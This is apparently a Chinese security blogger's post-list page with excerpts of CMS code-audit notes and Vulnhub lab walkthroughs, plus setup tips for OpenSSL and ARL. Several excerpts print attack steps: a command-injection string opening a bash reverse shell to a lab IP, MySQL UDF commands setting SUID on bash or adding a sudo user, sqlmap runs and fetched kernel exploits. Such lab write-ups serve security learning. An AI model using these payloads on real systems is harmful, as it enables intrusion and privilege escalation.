- 博客(16)
- 收藏
- 关注
原创 代码审计系列2:小众cms oldcms
sqlmap验证:python sqlmap.py -r test.txt --level 5 --risk 3。可以知道pl_safe是做过滤的,但是过滤的并不严谨,可绕过。选中Login_check函数,CTRL+b 跟进去。这处后台登录的地方,可以使用sql万能密码登录后台。先看一下pl_safe函数是做什么的。
2025-04-17 16:15:07
121
原创 熊海cms代码审计
把数据包保存成test.txt python sqlmap.py -r test.txt。editcolumn.php里面不止这里有sql注入,其他执行sql语句的地方也有注入。变量delete和delete2可控,并被带到sql语句中执行,字符型,使用报错注入。变量action可控,并被include函数包含。使用了mysql_error函数,使用报错注入。变量user可控并被带到sql语句中执行。要添加变量type=1才会执行SQL语句。burp抓包,发送到repeater。都是可控的,存在注入。
2025-04-15 21:02:41
551
原创 Vulnhub-FristiLeaks打靶
总结:通过靶机名发现fristi目录,f12发现注释,进行base64解码后知道了密码,登录后使用apache解析漏洞成功获取到shell,最后使用脏牛进行提权
2024-12-27 17:49:36
715
原创 Vulnhub-SolidState打靶
通过James-admin的默认密码登录后,修改所有用户的密码后,登录pop3发现邮件里面的ssh密码,登录并进行rbash逃逸,最后使用root执行的py文件进行提权
2024-12-25 22:22:30
914
原创 Vulnhub-Kioptrix 2014 打靶
通过历史漏洞读取apache配置文件,知道配置规则后访问8080,又通过8080页面的历史漏洞getshell,最后使用nc上传提权的exp,进行编译,运行后得到root权限
2024-12-11 20:05:13
1783
原创 Vulnhub-Kioptrix Level 4 打靶
UDF提权不止有创建新用户并赋予root权限,下面还有几种方法供大家选择:1. 设置 SUID 位通过设置 SUID 位,允许普通用户以 root 权限运行某些程序,例如 /bin/bash:SELECT sys_exec('chmod u+s /bin/bash');2.将用户 john 添加到 sudo 组SELECT sys_exec('/usr/sbin/usermod -aG sudo john');3.修改系统登录文件(如 /etc/passwd)将 root 用户的密码直接移除
2024-12-10 19:45:20
815
原创 Vulnhub-Kioptrix Level 2 打靶
现在功能正常了 nc监听并构造payload反弹shell:127.0.0.1 && /bin/bash -c 'bash -i >& /dev/tcp/192.168.213.128/443 0>&1'nmap -sn 192.168.213.0/24 #在靶机打开时和未打开时使用这条命令,判断那个IP为靶机。apache 2.0.52有 dos漏洞,也探测出有csrf漏洞,没法getshell,放弃。是一个登录界面,先f12看一下,会不会泄露出是什么cms或发现其他的敏感信息。
2024-12-07 17:47:49
1858
原创 Vulnhub Kioptrix Level 1打靶
searchsploit apache mod_ssl 发现能利用的exploit, 远程缓冲区溢出,能拿到shell。发现apache版本为1.3.20,打开网页使用Wappalyzer又发现mod_ssl 版本为2.8.4。在 http://github.com/heltonWernik/OpenLuck 找到编译利用的方法。在靶机上wget http://192.168.213.132:8888/ptrace-kmod.c。#对开放的端口进行详细的探测服务版本,保存到detail中。
2024-12-06 21:09:26
479
原创 秒懂 OpenSSL 配置!教你在 Visual Studio 中使用 AES 加密库
1.下载链接: https://slproweb.com/products/Win32OpenSSL.html。2.在C/C++的常规中添加 C:\OpenSSL-Win64\include 到附加包含目录。3.在 链接器的常规中添加 C:\OpenSSL-Win64\lib 到附加库目录。4.在链接器的输入中添加 libcrypto.lib 到 附加依赖项。无法打开 源 文件 "openssl/aes.h"此电脑右键属性,高级系统设置,高级里面的环境变量。在系统变量中,新建一个,填好,点击确定。
2024-11-15 17:33:36
600
原创 快速上手ARL:安装及个性化指纹与字典配置详解
docker cp new_domain.txt arl_web:/code/app/dicts/ #将域名爆破字典导入到 ARL 的字典管理目录。下载后,放到kali桌面,输入 python ARl-Finger-ADD.py https://IP:5003/ admin password。docker cp files.txt arl_web:/code/app/dicts/ #将文件泄露爆破字典导入到 ARL 的字典管理目录。改成 ARL_VERSION=v2.6.1。
2024-11-10 20:33:15
960
2
原创 Windows基础—cmd命令
copy 1.txt+2.txt 3.txt 把1.txt和2.txt里面的内容合并起来,重命名为3.txt。move ..\1.txt 4.txt 把上一级目录的1.txt 移动到本机目录,并重命名为4.txt。copy 1.txt desktop\2.txt 把1.txt复制到桌面并重命名为2.txt。copy 1.txt ..\1.txt 把1.txt复制到上一级目录。ren 4.txt 5.txt 把4.txt重命名为5.txt。
2024-11-02 16:30:42
416
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人